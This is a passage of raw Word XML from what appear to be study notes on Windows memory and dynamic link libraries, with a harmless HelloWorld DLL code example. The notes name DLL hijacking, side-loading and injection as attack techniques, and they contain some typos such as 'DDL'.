      <w:r w:rsidRPr="009008E0">
        <w:t>The theoretical maximum virtual address space is 256 TB on a 64-bit modern system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AC0CAC" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5695ED7C" wp14:editId="50C49B71">
            <wp:extent cx="2489200" cy="2039471"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1667707171" name="Picture 2" descr="A group of square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7171" name="Picture 2" descr="A group of square boxes with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638" cy="2046385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="316EEFBD" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:r w:rsidRPr="009008E0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Most issues that require settings or AWE are resolved </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r w:rsidRPr="009008E0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> increas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="009008E0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> theoretical maximum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EFE38E" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009"/>
    <w:p w14:paraId="18F9736A" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C00009">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC593C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dynamic Link Libraries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> “DDL”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CD5F28" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC593C">
        <w:t>DLL "a library that contains code and data that can be used by more than one program at the same time."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C85D78" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC593C">
        <w:t xml:space="preserve">When a DLL is loaded as a function in a program, the DLL is assigned as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC593C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC593C">
        <w:t xml:space="preserve">. Since a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC593C">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>program is dependent on a DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B69990" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC593C">
        <w:t>ttackers can target the DLLs rather than the applications</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E0268" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00BC593C" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC593C">
        <w:t>DLL Hijacking (</w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BC593C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>T1574.001</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BC593C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1F0222" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00BC593C" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC593C">
        <w:t>DLL Side-Loading (</w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BC593C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>T1574.002</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BC593C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A1AE96" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00BC593C" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC593C">
        <w:t>DLL Injection (</w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BC593C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>T1055.001</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BC593C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB3A156" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>DDL is just a code. (.ddl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694128FF" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00BC593C" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC593C">
        <w:t>DLLs can be loaded in a program using </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC593C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>load-time dynamic linkin</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “load it like importing it’s file at beginning of your code so can use it”</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC593C">
        <w:t> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC593C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>run-time dynamic linking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“loading it just while running and load just specific function from it”</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF071D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CEA6CB" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E1594B" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DDL Code Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452B57C8" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0014205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>File: sampleDLL.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD35CB7" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>#include "stdafx.h"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09988FC8" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>#define EXPORTING_DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD0A115" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>#include "sampleDLL.h"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC069AA" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A259BA" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    return TRUE; // Called when DLL is loaded/unloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19590C8A" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0842C70E" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>void HelloWorld(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DB0B0D" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>MessageBox(NULL, TEXT("Hello World"), TEXT("In a DLL"), MB_OK);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243B694" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC04932" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DllMain</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF071D">
        <w:t>: Entry point for the DLL. Called on load/unload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC4DF8E" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HelloWorld</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF071D">
        <w:t>(): A function we export — shows a message box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C0FCA4" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA8DFF2" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA3FB83" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF4BE10" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="0014205E" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>File: sampleDLL.h (Header file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142C2DC1" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:t>#ifndef INDLL_H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE3F297" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:t>#define INDLL_H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDE94E0" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:t>#ifdef EXPORTING_DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72021F54" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:t xml:space="preserve">    extern __declspec(dllexport) void HelloWorld();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5678BE12" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:t>#else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71208962" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:t xml:space="preserve">    extern __declspec(dllimport) void HelloWorld();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0843746F" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:t>#endif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED6754E" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:t>#endif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F06E8" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:t xml:space="preserve">When building the DLL: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF071D">
        <w:t xml:space="preserve"> HelloWorld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C98B664" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="00FF071D" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF071D">
        <w:t xml:space="preserve">When using the DLL: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF071D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF071D">
        <w:t xml:space="preserve"> HelloWorld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3999F870" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="1080" w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62DCBFEB" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="0014205E" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="1080" w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
        </w:rPr>
        <w:t>Using the DLL in an Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BB9567" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="0014205E" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load-Time Linking (Simpler, Static)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5F7400" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>#include "stdafx.h"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F1E6D6" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#include "sampleDLL.h"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F317A7B" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>int APIENTRY WinMain(...) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6834993F" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    HelloWorld();  // Call the function directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E7FA8D" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1283C5F2" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644D9CC5" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="0014205E">
        <w:t xml:space="preserve"> Needs .lib and .h files at </w:t>
      </w:r>
      <w:r w:rsidRPr="0014205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>compile time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108412D4" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014205E">
        <w:t>Less flexible; if DLL is missing, app won</w:t>
      </w:r>
      <w:r w:rsidRPr="0014205E">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="0014205E">
        <w:t>t start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D2F9A7" w14:textId="77777777" w:rsidR="00C00009" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C03CB4" w14:textId="77777777" w:rsidR="00C00009" w:rsidRPr="0014205E" w:rsidRDefault="00C00009" w:rsidP="00C57C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
